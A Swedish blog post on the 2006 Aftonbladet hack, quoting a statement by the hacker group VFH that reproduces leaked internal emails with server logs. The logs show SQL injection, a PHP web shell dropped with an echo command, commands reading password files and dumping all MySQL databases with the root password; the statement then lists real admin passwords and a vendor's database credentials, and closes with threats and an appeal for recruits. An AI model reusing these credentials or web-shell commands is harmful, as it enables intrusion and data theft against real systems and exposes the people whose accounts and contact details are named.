Klart Vuxna Förbannade Hackare är intresserade av att avslöja sig. Or not =)
Dom är så roligt på aftonbladet, där går det att läsa "Tidningens chefredaktör Jan Helin: ”Kom och hälsa på – jag ska med spänning lyssna på er och förklara hur jag ser på saken”

Det går också att läsa på Aftonbladet
"Gruppen är extremt skickliga på datorer. Genom att ta sig in i Aftonbladets datasystem har de på punkt för punkt avslöjat svagheterna i våra system."
Men ska man se vad som är tidigare har hänt tidigare med aftonbladet så kan man ju misstänka att säkerheten inte har varit så himla bra på Aftonbladet.
Så varför skulle AFH vilja komma till Aftonbladet och förklara för dom hur dom ska skydda sig för att inte sådana som AFH ska kunna angripa igen?

"Men VFH:s nya uppgifter visar ytterligare en sak: De kan nu ha tillgång till information som är källskyddad enligt svensk grundlag. På ren svenska: journalisters kontakter med källor. Det är vårt allra heligaste."
Ja det kanske man ska tänkt på första gången, eller trodde dom inte på dom då eller vadå?
Jag tycker företag är så naiva när dom får information som berättar för dom vilka fel som finns, men dom vill inte lyssna för deras "jätte duktiga IT-experter kan ju det här", eller så kanske det inte var så.

"Kom och hälsa på mig på redaktionen söndag klockan 15.00, eller på måndag samma tid. Vi kan göra något så omodernt men mysigt som att dricka eftermiddagskaffe. Jag ska med spänning lyssna på er och förklara hur jag ser på saken."
Ja det återstår ju att se om dom kommer, men ska jag chansa så tror jag inte att dom komemr sätta sin fot där, inte ens för att Aftonbladet lovar "Ni kan självklart förbli helt anonyma om ni så vill. Svensk grundlag förbjuder mig att röja era identiteter." då dom har bevisat att det verkar ju inte fungera.

Du kan läsa mera på Aftonbladet här samt en tidigare artikel om Fortsatta problem efter dataintrånget

Nu är dom framme igen och givit lite svar på tal på mail som har gått via aftonbladet angående hackningarna tidigare år.

Det här är direkt taget ifrån Flashback forumet.

"Hej ärade Flashbackare och svenka folk!
VFH här igen. Ville bara tacka för allt ni bidragit med och att vi inte sitter
och är förbannade för oss själva över vad media håller på med. Den ointressanta
smörja Aftonbladet väljer att skriva om är verkligen inte journalistik och skall
inte accepteras.

Folket måste göras påminda om att det media skiter ur sig och trycker på oss
inte alltid är sanningen. Istället väljer man att köra på det som säljer och en
massa jävla snyfthistorier och smutskastning av människor. Usch. Verkligen skönt
att se det är fler som håller med oss och tycker att dräggen på aftonhoran skall
få stå sitt kast och hängas ut.

Det är inte OK att helt utan grunder publikt håna folk bara för att man har
möjlighet att göra det (eller vad tycker ni på Aftonbladets redaktion?).

Även om så pass många håller med om att Aftonbladet är skit tycks de bli större
och prackar på oss fler och fler bilagor, gratistidnignar och tv-kanaler. Det är
nog många som är villiga att skriva under på att det är allt annat än en god
utveckling. Denna incident har förhoppningsvis bidragit till ett förlorat
förtroende för Aftonbladet när det gäller tipsare, kunder och andra som haft att
göra med tidningen. Något som glädjer oss innerligen.

Aftonbladet, inse att ni är tokägda och att folket är förfärligt trötta på era
lögner. Intranätet kanske innehöll lite mer än vad ni sagt?

Om ni ska gå igenom logg efter logg så kan vi ge er ett tips på vart ni ska börja.
Hur gick detta till? Ja, Aftonbladet. Hur tog vi oss in?
Här är Aftonbladets version om hur vi tog oss in, men aldrig ut ur annonsystemet år 2006.

—

From: Xxx Xxx xxx.xxx@aftonbladet.se
Sender: "lg teknik" lg.teknik@aftonbladet.se
Subject: Re: [lg.teknik] transfer3 uppdatering…
Date: Wed, 21 Jun 2006 20:35:20 +0200
To: * "lg teknik" lg.teknik@aftonbladet.se

21 jun 2006 kl. 18.55 skrev Xxx Xxx:

Hej!

Vi har nu rett ut hur intrånget gick till. Svagheterna i vår konfiguration var flera som ni kommer att se i beskrivningen:

Hackarna nyttjade inloggningsfunktionen på annonsmottagningstjänsten. Så här ser php-koden ut:

Om man inte väljer att köra addslashes på $user och
$password så måste man välja att slå på "magic quotes" i
php-konfigurationen. Om "magic quotes" är på så körs addslashes
funktionen på alla variabler som skickas in från formulär. Problemet
var att magic quotes inte var påslaget. Vi kan lägga ett stort ansvar
för den missen på Infomaker då vi tidigare fått rekommendationen att
slå av "magic quotes" av Xxx Xxx på Infomaker när en funktion i
tjänsten inte fungerade som den skulle. Jag har kvar det mailet som han
skickade 17 maj i år. Förmildrande för Infomaker är att Xxx Xxx
hos dem, som utvecklat tjänsten, har arbetat mycket med oss för att
hitta intrångsvägen och även spårat upp en av de som sannolikt
genomförde intrånget. Jag lämnar det till Oscar att besluta om vi ska
polisanmäla hackarna, samt om vi ska föra en diskussion med Infomaker
om kompensation.

En annan svaghet som möjliggjorde intrånget var att användaren som
anslöt till mysql från annonstjänstens php-kod hade fulla rättigheter i
mysql och kunde därför skapa mysql-tabellen och dumpa ut den i en fil.

….

21 jun 2006 kl. 09.48 skrev Xxx Xxx:
Hej allihopa,

jag har lekt lite detektiv med de loggar som jag har fått ta del av och tolkar dom så här:
Initialt så var det ett par svenska killar som gav sig in på att testa lite out
of the box hackerlösningar på aftonbladet och lyckades med en sql
injection och skapade cmd2.php (på samma sätt och med samma filnamn som
jag hittade i ett kinesiskt forum). Dessa svenska killar spred sedan
uppgifterna på något slags forum eller via en irc-kanal vilket
resulterade i att ganska snart började det dyka upp såväl amerikanska,
kinesiska som tyska ip-nummer i loggen som alal anropar filen. Eftersom
det är en out of the box lösning och dom har använt sig avsamma filnamn
som i exemplet så får det mig att tro att dom är inga experter, deras
kommandon som dom sedan har skickat in är också ganska sporadiska. Vi
har lyckats identifiera två tidiga ip-nummer från logutdraget nedan:
84.55.93.136 och 213.113.27.69. Båda förekommer tidigt i det utdraget
och båda går till två svenska internetlevrantörer:

84.55.93.136 84-55-93-136.rev.sth.ownit.se
213.113.27.69 c-451b71d5.026-20-6b6c6d11.cust.bredbandsbolaget.se

Det sistnämnda ipnummret visade sig innehålla en webbsida, "orelevant". En
googing på det visade att det dessutom fanns en registrerad domän på
den orelevant. Nic-se gav mig ett namn på innehavaren av den adressen:
"Xxx Xxx". en googling på "orelevant" gav mig ett
antal träffar i olika linux, kernel och hackerforum samt ett
födelsedatum "orelevant" http://kerneltrap.org/user/orelevant och en epsotadress aftonbladetsucks@aftonbladet.se.
Birthday.se gav mig en ort(orelevant) på en Xxx Xxx född XXXX. Hitta.se gav mig en adress:
Xxx Xxx Tfn/fax: XXXX-XXXXXXX (Delas med (det är aftonbladet vi vill åt) Adress Orelevant. XX X XXXXX XXXXX
Eftersom Xxx verkar vara aktiv i olika linux, kernel, exploit forum så
tycker jag att det tyder på att han förmodligen inte har blivit hackad
själv utan tvärtom har ett litet intresse av den här typen av
aktiviteter och han förmodligen fått ta del av den här lösningen i
något forum (förmodligen en gansk aktiv kanal) och att han har testat
lite. Mitt förslag är att någon på aftonbladet juridiskt kunnig person
kontaktar Xxx, får hans knäna atts kaka och
tänder att skallra samt ber honom om information om var har har fått
tillgång till den här informationen och på vilket sätt han har nyttjat
den samt om han känner till om och hur och när andra har utnyttjat den.
På så sätt bör vi (om vi vill) kunna rotadjupare i det här ärendert och
kanske kunna komma åt själva källan. Men innan
vi gör något sådant ger jag er rådet att slå på magic_quotes i er
php.ini så att inga upprörda hackare får för sig att göra någonting värre.

—

[* Allt jävla kinaprat och skit om att vi lagt upp information på nått tattarforum säger
ju en del om hur lite insikt de har. Döm själva. *]

20 jun 2006 kl. 16.00 skrev Xxx Xxx:

Efter att vi plockade bort h4x.php filen så lyckades hackaren skapa den på nytt. Access-loggen visade ingenting:

209.242.5.54 – - [18/Jun/2006:21:07:45 +0200] "GET /h4x.php HTTP/1.1" 404 291
209.242.5.54 – - [18/Jun/2006:21:08:17 +0200] "POST /index.php HTTP/1.1" 200 212
209.242.5.54 – - [18/Jun/2006:21:10:25 +0200] "POST /index.php HTTP/1.1" 200 78
209.242.5.54 – - [18/Jun/2006:21:10:57 +0200] "GET /h4x.php?cmd=id HTTP/1.1" 200 101

21:07:45 fanns filen inte. 21:10:57 så var den på plats. Error loggen däremot:
[Sun Jun 18 21:07:45 2006] [error] [client 209.242.5.54] File does not exist: /Library/WebServer/Documents/annons/h4x.php
[Sun Jun 18 21:08:17 2006] [error] PHP Notice: Undefined variable: version in /Library/WebServer/Documents/annons/includes/prefs.php on line 2
[Sun Jun 18 21:08:17 2006] [error] PHP Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in /Library/WebServer/Documents/annons/includes/functions.php on line 759
[Sun Jun 18 21:10:25 2006] [error] PHP Notice: Undefined variable: version in /Library/WebServer/Documents/annons/includes/prefs.php on line 2

21:07:45 fanns inte filen där. 21:08:17 så körs följande PHP kod som avslutas med en PHP-varning:
function doLogin($user,$password){ $query = "SELECT * FROM user ;WHERE userName='$user' AND password='$password'"; $result = mysql_query($query) OR DIE(mysql_error()); $rows = mysql_NumRows($result); if($rows!=0){

Jag gissar att hackaren utnyttjar någon form av SQL injection svaghet i
variablerna user och/eller password som får antingen PHP eller MySQL
att urarta på ett sånt sätt att filen h4x.php skrivs till disk. Det
känns mer troligt att det är PHP, då filen skapas i PHPs rootmapp.

Den här texten känns mycket relevant:

http://www.sitepoint.com/article/php-security-blunders/2

Intressant är att den rekommenderade lösningen, att slå på magic quotes
rekommenderade Xxx oss att slå av när Xxx ville byta en språkvariabel.

/Ian

Från: Xxx Xxx xxx@infomaker.se
Datum: tisdag 20 jun 2006 11.31.01 GMT+02:00
Till: Xxx Xxx xxx.xxx@aftonbladet.se
Kopia: Xxx Xxx xxx.xxx@aftonbladet.se, Xxx Xxx infomaker.se, Xxx Xxx xxx@infomaker.se
Ämne: Re: h4x

Hej,

nu har jag tittat lite på loggarna och googlat lite. Det visade sig att
nyckeln ligger i cmd2.php som är inkörsporten. cmd2.php verkar kunna
komma in på en del olika sätt ett är att en bugg i xml-rpc gör att om
man kör en eval() på vissa typer av xml kan gör att man kan skapa
php-filer på servern. Ett exempel är t.ex om man kör CMS-systemet
Drupal (http://secunia.com/advisories/15852/). Vad kör ni mer på servern än annonsmottagningen?
Ett annat sätt att skapa filen verkar vara genom att med hjälp av en sql-injection:

1. skapa en ny tabell i mysql
2. peta in php-kod i den nya mysql-tabellen
3. göra en mysql-selection till en extern fil (ny har vi en php-fil som går att köra)
4. gör en ;drop på tabellen så att spåren försvinner i mysql.

Jag hittade en liten instruktion på hur man gör det på en chinesisk site: http://www.cnxhacker.com/Article/show/378.html

Det här kan man lösa genom att dels verifiera att ingen php åker in i mysql
och att den användare sqom websysteme använder inte får dumpa data till
fil och inte får skapa nya tabeller. Att enbart se över mysqlanvändsarens rättigheter är en snabb fix.

/Xxx

20 jun 2006 kl. 10.57 skrev Xxx Xxx:

transfer3:/Library/WebServer/Documents/annons root# cat /var/log/httpd/access_log | grep h4x
…
66.63.162.152 – - [18/Jun/2006:02:40:09 +0200] "GET /annons/cmd2.php?cmd=echo%20%22%3Cpre%3E%3C?%20system($_GE T['cmd']);%20?%3E%3C/pre%3E%22%3Eh4x.php HTTP/1.1" 200 52
66.63.162.152 – - [18/Jun/2006:02:40:23 +0200] "GET /annons/h4x.php?cmd=id HTTP/1.1" 200 5
66.63.162.152 – - [18/Jun/2006:02:41:14 +0200] "GET /annons/cmd2.php?cmd=rm%20h4x.php HTTP/1.1" 200 52
66.63.162.152 – - [18/Jun/2006:02:46:48 +0200] "GET /annons/cmd2.php?cmd=echo%20%22%3Cpre%3E%3C%3F%20system(\\ $_GET['cmd']);%3F%3E%3C/pre%3E%22%3Eh4x.php HTTP/1.1" 200 52
66.63.162.152 – - [18/Jun/2006:02:47:52 +0200] "GET /annons/h4x.php?cmd=rm%20cmd.php HTTP/1.1" 200 24
66.63.162.152 – - [18/Jun/2006:02:47:59 +0200] "GET /annons/h4x.php?cmd=rm%20cmd2.php HTTP/1.1" 200 24
85.10.240.250 – - [18/Jun/2006:03:08:50 +0200] "GET /annons/h4x.php?cmd=cat%20/private/etc/afpovertcp.cfg HTTP/1.1" 200 539
85.10.240.250 – - [18/Jun/2006:03:09:10 +0200] "GET /annons/h4x.php?cmd=cat%20/etc/authorization HTTP/1.1" 200 17509
85.10.240.250 – - [18/Jun/2006:03:11:12 +0200] "GET /annons/h4x.php?cmd=cat%20/private/etc/ftpusers HTTP/1.1" 200 143
72.21.33.202 – - [18/Jun/2006:03:22:10 +0200] "GET /annons/h4x.php?cmd=ls%20/Network/Servers HTTP/1.1" 200 49
72.21.33.202 – - [18/Jun/2006:03:22:34 +0200] "GET /annons/h4x.php?cmd=ls%20/Network/Servers/transfer3.aftonbladet.se/ HTTP/1.1" 200 175
88.191.22.62 – - [18/Jun/2006:03:30:30 +0200] "GET /annons/h4x.php?cmd=ls%20/Users/admin/Sites HTTP/1.1" 200 42
149.9.0.25 – - [18/Jun/2006:03:41:12 +0200] "GET /annons/h4x.php?cmd=ls%20-al%20../inpoc/admin HTTP/1.1" 200 255
149.9.0.25 – - [18/Jun/2006:03:41:50 +0200] "GET /annons/h4x.php?cmd=cat%20../inpoc/admin/properties.txt HTTP/1.1" 200 25
199.77.130.14 – - [18/Jun/2006:03:45:00 +0200] "GET /annons/h4x.php?cmd=cat%20/Library/WebServer/Documents/inpoc/admin/index.php HTTP/1.1" 200 1887
199.77.130.14 – - [18/Jun/2006:03:46:09 +0200] "GET /annons/h4x.php?cmd=cat%20/Library/WebServer/Documents/inpoc/.htpasswd HTTP/1.1" 200 44
88.191.12.200 – - [18/Jun/2006:03:47:51 +0200] "GET /annons/h4x.php?cmd=strings%20/private/etc/pure-ftpd/pureftpd.passwd HTTP/1.1" 200 7639
193.219.28.245 – - [18/Jun/2006:03:52:18 +0200] "GET /annons/h4x.php?cmd=ls%20-la%20/Library/FTPServer/VirtualUsers/aftonbladet/ HTTP/1.1" 200 207
193.219.28.245 – - [18/Jun/2006:03:53:01 +0200] "GET /annons/h4x.php?cmd=ls%20-la%20/Library/FTPServer/VirtualUsers/sport HTTP/1.1" 200 279
….
transfer3:/Library/WebServer/Documents/annons root#
- ——————————————

Xxx Xxx

Infomaker Scandinavia AB

Box 347, SE-391 23 Kalmar, Sweden

Tel +46 480 36 20 05, Fax +46 480 887 25

xxx@infomaker.se, <a href="http://mail.aftonbladet.se/Redirect/www.infomaker.se" target="_blank">www.infomaker.se</a>

—

[* Vart fan får han xml-rpc idéerna ifrån? Senaste dödsbuggen på bugtraq eller vad? *]

Från: Xxx Xxx xxx@infomaker.se
Datum: tisdag 20 jun 2006 19.46.27 GMT+02:00
Till: Xxx Xxx xxx.xxx@aftonbladet.se
Kopia: För många.

Japp,
om man har slagit av magic_quotes så har man ett säkerhetshål som
tillåter sql-injections. Slå omedelbart på den igen. Verifiera också
att den mysql-användare som körs via scriptet includes/dbConnect.php
inte får skapa tabeller, inte får skriva till fil.

Mvh Xxx

—

From: Xxx Xxx xxx.xxx@aftonbladet.se
Sender: "* lg teknik" lg.teknik@aftonbladet.se
Subject: Re: [lg.teknik] SV: [lg.teknik] Fwd: [nattrapport] Dagrapport Tisdag den 20 Juni
Date: Thu, 22 Jun 2006 02:11:47 +0200
To: "* lg teknik" lg.teknik@aftonbladet.se

Följande tjänster är tillgängliga på yttre:

aftonbladet.se – länk till sajten.
anslagstavlan – internt köp och sälj.
bandbredd – direkt länk till IP-only, bör den ens finnas där?
blanketter – ladda hem blanketter.
boka – boka rum osv.
chatparade – antalet samtida chattare, fel lösen?
enkäten – internt enkät verkyg, vet ej om det används?
exchangemail – nerlagd tjänst.
hitparade – antalet besökare till aftonbladet, nerlagd 2005?
julklapp – tjänst där man väljer storlek på väst som man fick i år.
kalender_admin – adventkalender på galento-admin
kartor – länk till hitta.se
klicktoppen – fungerade länk till mest besökta länkarna på
aftonbladet.se, bör knappast finnas på yttre, då man lätt bokmärker
detta på hemdatorn, extremt känslig information!
landguiden – länk till landguiden.se
linkorama – död bokmärkeskatalog på galento
lämna bild – länk till tjänst på transfer3
lämna ljud – länk till http://kodar.aftonbladet.se/ som inte svarar, död?
lämna text – länk till tjänst på transfer3
mera rätt – länk till tjänsten mera rätt.
modempooler – länk till statisk sida om våra modempooler
motionera mera – länk till nerlagd projekttjänst
pepc – någon form av lämningstjänst för världsupplagan
pit – Samlingssida för www.aftonbladet.se övervakningssidor, funkar ej?
publicera på galento – kan man göra det från yttre?
resa – länk till www.ark.se
Rixlex – länk till http://www.riksdagen.se/debatt/
räckvidd – tjänst för att se ab och konkurrenters räckvidd, död?
shibsted aktiekurs – skönt felstavad tjänst som tur är nerlagd, med två användare?
stega på – nerlagd projekttjänst
Sverigekartan – länk till http://www.sna.se/webbatlas/700/, tjänsten suger jämfört med hitta.se
telegram – vår interna telegramtjänst
Tholin – länk med inloggning till tholin, enda användarna är ulla lundberg och fisken, död?
Upplysningscentralen – länk till http://www.uc.se/?
webbmail (säker) – länk till https://mail.aftonbladet.se
www statistik – samlingssida för aftonbladet.se statistik innehåller
länkar inklusive inloggning till extern extremt känslig information,
återigen kan bokmärkas på hemdatorer!

Några tjänster bör nog ryckas omedelbart pga de känsliga länkarna som
kan bokmärkas på datorer som vi inte äger. Andra kan nog strykas då de
är nerlagda.

Sista månaden har följande klickats på yttregalento:
webbmail (säker) – 1994 (bara en länk till mail.aftonbladet.se…)
meraratt – 450<br>
lämna text – 393 (fast man kan göra samma sak direkt i scoop)
aftonbladet.se – 317
telegram – 211
motionera mera – 140 (trots att tjänsten är nerlagd?)
anslagstavlan – 69
lämna bild – 32
resa – 28
www statistik – 20
blanketter – 19
modempooler – 6

/Ian

21 jun 2006 kl. 12.37 skrev Xxx Xxx:

En till oroväckande tanke. eftersom mysqldumpen är på vift så innebär det
också att alla era kunder inlogg med tillhörande lösenord är på vift.
Det enda rimliga är att man automatgenererar nya lösenord och mailar ut
dessa till era kunder med automatik.

Mvh Xxx

—

21 jun 2006 kl. 12.15 skrev Xxx Xxx:

Jag får en känsla av att filen hx4.php finns på flera ställen anrop sker ju
till både /annons/h4x.php och /h4x.php har ni sökt och rensat
ordentligt? det vorde också spännande att få ta sig en titt på exakt
vad dom innehåller. (både h4x.php och cmd2.php)

/Xxx

–

21 jun 2006 kl. 11.56 skrev Xxx Xxx:

Nu har jag läst loggarna och det är ingen rolig läsning. Det har rört sig
om ganska mycket aktivitet och den del är direkt farlig och öppnar nya
hål:

här sker angreppet:
217.160.135.169 – - [18/Jun/2006:02:05:25 +0200] "POST /index.php HTTP/1.1" 200 212

här skapas filen på nytt:
209.242.5.54 – - [18/Jun/2006:21:10:25 +0200] "POST /index.php HTTP/1.1" 200 78

rootlösen för mysql på avvägar:
84.19.182.23 – - [18/Jun/2006:21:25:18 +0200] "GET /h4x.php?cmd=mysqlshow%20–user%20root%20–password=8ull3r6yn HTTP/1.1" 200 62

alla databaser dumpade till fil:
195.169.149.213 – - [18/Jun/2006:21:28:02 +0200] "GET /h4x.php?cmd=mysqldump%20–all-databases%20–user%20root%20-p%208ull3r6yn%20%3E%20/tmp/.e HTTP/1.1" 200 62
misslyckades med dump raderar och läser mysql–help
195.169.149.213 – - [18/Jun/2006:21:28:25 +0200] "GET /h4x.php?cmd=cat%20/tmp/.e HTTP/1.1" 200 62
195.169.149.213 – - [18/Jun/2006:21:28:39 +0200] "GET /h4x.php?cmd=rm%20-f%20/tmp/.e HTTP/1.1" 200 62
195.169.149.213 – - [18/Jun/2006:21:28:49 +0200] "GET /h4x.php?cmd=mysqldump%20–help HTTP/1.1" 200 62

lyckades med mysqldump:
195.169.149.213 – - [18/Jun/2006:21:33:42 +0200] "GET /h4x.php?cmd=/usr/local/mysql/bin/mysqldump%20–all-databases%20–user=root%20–password=8ull3r6yn%20%3E/tmp/.e HTTP/1.1" 200 62
195.169.149.213 – - [18/Jun/2006:21:36:35 +0200] "GET /h4x.php?cmd=cat%20/tmp/.e HTTP/1.1" 200 3902808

Hämtar hem lösenordsfil för apache htaccess
199.77.130.14 – - [18/Jun/2006:03:46:09 +0200] "GET /annons/h4x.php?cmd=cat%20/Library/WebServer/Documents/inpoc/.htpasswd HTTP/1.1" 200 44
plockar hem lösenordsfil för purftpd:
88.191.12.200 – - [18/Jun/2006:03:47:51 +0200] "GET /annons/h4x.php?cmd=strings%20/private/etc/pure-ftpd/pureftpd.passwd

rotar i appleshare:
88.191.12.200 – - [18/Jun/2006:03:53:20 +0200] "GET /annons/h4x.php?cmd=ls%20-la%20/Library/Filesystems/AppleShare/Authentication HTTP/1.1" 200 127

mystiskt anrop: 213.92.92.22 – - [18/Jun/2006:03:53:24 +0200] "GET /w00tw00t.at.ISC.SANS.DFind HTTP/1.1" 400 416

systemets lösenordsfil hämtas hem (förhoppningsvis är den shadowad):
84.55.93.136 – - [18/Jun/2006:10:07:27 +0200] "GET /annons/h4x.php?cmd=cat%20/etc/passwd HTTP/1.1" 200 1885

Alltså:
- – rootlösen för mysql är på vift tillsammans med all data som fanns lagrad i mysql. Byt lösenord.
- – lösenordet för afp kan vara hackat
- – man har med stor sannolikhet bruteforcecrackat lösenorden till htaccess, pureftpd och även systemlösenord (om nu inte den filen var shadowad).

Alltså byt alla lösenord nu. När ni har gjort det se till att byta till det nya mysqllösenordet i filen includes/dbConnect.php

/Xxx

—-

Och självfallet bjussar vi på lite mera skoj:
http://pastebin.com/m554733a3

Notera att lösenorden för annonserna fortfarande fungerar och att annonsföretagen
inte fick sina lösenord utbytta eller ens en notering om att vi fått tag på dem.

Här är en liten lista på vilka admin-lösenord som använts och används:

jawohl
hepburn
catherine
sinatra
donjuan
5pad3r
8ull3r6yn
k4ll34nk455

Samt lite länkar värda att besöka:

transfer3.aftonbladet.se/inpoc/
http://annons.aftonbladet.se/admin/
http://annons.aftonbladet.se/

Lite kort om Infomaker/xlibris:
"XLibris Publisher är ett webbpubliceringssystem som troligen är det mest använda på tidningar i Sverige. Systemet är uppbyggt kring en kraftfull mediadatabas för texter, bilder, filer, länkar m m. Tillsammans med databasen byggs ett mallsystem för din webb upp. Mallarna kan liknas vid sidmallar för vanlig tidningsproduktion kompletterade med intelligens."

Här har ni Infomakers lösenord (som kanske fungerar på annat håll, vem vet :

$db = mysql_pconnect("localhost","xlibris","xRpm2000");

Ni har några års loggar att gå igenom, hoppas ni får det skoj!

"Nu har jag läst loggarna och det är ingen rolig läsning."
MOAUHGAUHHHAHAHA

Allt prat om att vi tog oss in via er internsida är bara skit. Det var där vi dumpade de
hashade lösenorden därför att den efterblivna algoritm som används där har sårbarheter.
Idioter.

Tills vidare. Aftonbladet: Ert mörkläggande av det här är fan pinsamt. Vi begär
att ni inom kort går ut med en vräkartikel på er hemsida och i er superfina
tidning där ni själva erkänner att det är NI som varit ignoranta och helt jävla
CHOCKDUMMA. Kan ni skriva om Kikki & Co och hur fel de beter sig, helt utan
empati, så nog fan är det dags att ni själva inser vad ni lyckats med. Ansvaret
ligger hos er. Hur fan kan ni vara så taffliga när det kommer till att hantera
denna typ av information?

Gå ut med sanningen nu eller så börjar vi publicera andra saker – som ni redan vet
så har vi tappat alla våra spärrar för moral för länge sedan, jävlas inte..

En kort notis:
Vi har ingen som helst koppling till AUH. Likheten av namnval valde vi utav
respekt för vad de står för och lyckats med. Vi hoppas att aktioner likt denna
gör att fler folk blir inspirerade till att hacka, så som vi blivit av AUH.

Och det kan även nämnas att:
En samling förbannade hackare som lyckats filura ut hur man kontaktar oss har
anslutit sig till VFH och kommer att hjälpa till med framtida uppdrag. Om du/ni
känner er manade samt besitter höga kunskaper inom datorer och jävulskap hoppas
vi mer än gärna att ni ansluter er till oss.

Mvh. Vuxna Förbannade Hackare

"Intelligence without ambition is a bird without wings." "

Det är ganska intressant läsning det här.
Ni kan fortsätta med diskussionen här
Kan även läsa på IDG "Ytterligare Aftonbladet-lösenord publicerade på nätet" lika så "Hackare hotar Aftonbladet"

Det har även läckt ut en bild ifrån den hackade sidan som ska ligga som bevis för att attacken har genomförts då inge bilder har visas tidigare.